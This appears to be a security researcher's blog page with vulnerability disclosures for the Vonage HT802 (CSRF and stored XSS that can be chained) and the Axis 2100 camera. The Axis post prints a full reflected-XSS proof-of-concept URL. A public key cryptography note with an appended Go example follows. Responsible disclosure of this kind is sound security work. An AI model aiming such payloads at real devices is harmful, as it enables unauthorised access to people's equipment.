Vonage HT802 – Multiple Vulnerabilities

I have disclosed three vulnerabilities in the Vonage (Grandstream) HT802.  I haven’t received a response from Vonage.  These vulnerabilities can be chained to inject persistent XSS in the Basic Settings screen of the device.

Update: I have received the following CVEs for these vulnerabilities:

1.) Cross-Site Request Forgery (CSRF) vulnerability in the login screen (/cgi-bin/login) allows an attacker to log into a target Vonage device. (CVE-2017-165635)

POC Verified in Firefox 56.0 on macOS

2.) Cross-Site Request Forgery (CSRF) vulnerability in the Basic Settings screen allows an attacker to modify system settings. (CVE-2017-16563)

POC Verified in Firefox 56.0 on macOS

3.) Stored Cross-site scripting (XSS) vulnerability in cgi-bin/config2 in Vonage HT802 allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). (CVE-2017-16564)

POC Verified in Firefox 56.0 on macOS

These three vulnerabilities can be chained to inject a persistent XSS payload into the Basic Settings page.

Axis 2100 Network Camera 2.03 XSS Vulnerability

Update: this has been assigned CVE-2017-15885.

I have found a vulnerability in the Axis 2100 Network Camera running 2.03 firmware.  The vulnerability has been disclosed to the vendor, but the camera is no longer supported.

Reflected XSS in the web administration portal of the Axis 2100 Network Camera 2.03 allows an attacker to execute arbitrary JavaScript via the URL.

POC Verified on Firefox 55.0.3:

http://xxx.xxx.xxx,xxx/view/view.shtml?paramskip=yes&conf_Layout_BGColorEnabled=yes&conf_Layout_OwnBGColorEnabled=no&conf_Layout_OwnBGColor=White&conf_Layout_TextColorEnabled=yes&conf_Layout_OwnTextColorEnabled=no&conf_Layout_OwnTextColor=Black&conf_Layout_BackgroundEnabled=yes&conf_Layout_OwnBackgroundEnabled=no&conf_Layout_OwnBackground=http://&conf_Layout_TitleEnabled=yes&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3Cscript%3Ealert('test')%3C/script%3E&conf_Layout_LogoEnabled=yes&conf_Layout_OwnLogoEnabled=no&conf_Layout_OwnLogo=http%3A//&conf_Layout_LinkEnabled=yes&conf_Layout_OwnLinkEnabled=no&conf_Layout_OwnLink=http%3A//&conf_Layout_DescriptionEnabled=yes&conf_Layout_OwnDescriptionEnabled=no&conf_Layout_OwnDescription=&conf_Layout_RelayButtonsEnabled=yes&conf_Layout_AdminButtonsEnabled=yes&conf_Layout_LayoutEnabled=no

Tech Note: Public Key Cryptography

Four rules that are core to the use of public key cryptography and digital signatures:

  • When encrypting a message, use the recipient’s public key
  • When decrypting a message that you have received, use your private key
  • To digitally sign a message that you are sending to someone, use your private key
  • To verify the signature on a message sent to you by someone, use the sender’s public key
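The four rules above, worked through end to end with RSA-OAEP and RSA-PSS from Go's standard library. This is an added example, not code from the original note; the key sizes, message and party names are assumptions. Seal applies rules 1 and 3 (encrypt to the recipient's public key, sign with the sender's private key); Open applies rules 4 and 2 (verify with the sender's public key, decrypt with your own private key), and refuses to decrypt if the signature does not verify.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// NewKey generates a 2048-bit RSA key pair; only &key.PublicKey is ever shared.
func NewKey() (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, 2048)
}

// Seal applies rules 1 and 3: encrypt the message to the recipient's PUBLIC key
// (only their private key can open it), then sign the ciphertext with the
// sender's PRIVATE key so the recipient can attribute it to the sender.
func Seal(senderPriv *rsa.PrivateKey, recipientPub *rsa.PublicKey, msg []byte) (ct, sig []byte, err error) {
	ct, err = rsa.EncryptOAEP(sha256.New(), rand.Reader, recipientPub, msg, nil)
	if err != nil {
		return nil, nil, err
	}
	digest := sha256.Sum256(ct)
	sig, err = rsa.SignPSS(rand.Reader, senderPriv, crypto.SHA256, digest[:], nil)
	return ct, sig, err
}

// Open applies rules 4 and 2: verify the signature with the sender's PUBLIC key
// before doing anything else, then decrypt with the recipient's own PRIVATE key.
func Open(recipientPriv *rsa.PrivateKey, senderPub *rsa.PublicKey, ct, sig []byte) ([]byte, error) {
	digest := sha256.Sum256(ct)
	if err := rsa.VerifyPSS(senderPub, crypto.SHA256, digest[:], sig, nil); err != nil {
		return nil, fmt.Errorf("signature does not verify under sender's public key: %w", err)
	}
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, recipientPriv, ct, nil)
}

func main() {
	alice, _ := NewKey() // assumed sender
	bob, _ := NewKey()   // assumed recipient
	ct, sig, _ := Seal(alice, &bob.PublicKey, []byte("meet at noon")) // constructed message
	pt, err := Open(bob, &alice.PublicKey, ct, sig)
	fmt.Printf("%q %v\n", pt, err)
}
```

Swapping in a third party's public key at Open makes the signature check fail (rule 4), and a third party's private key cannot decrypt a message sealed to Bob (rule 2).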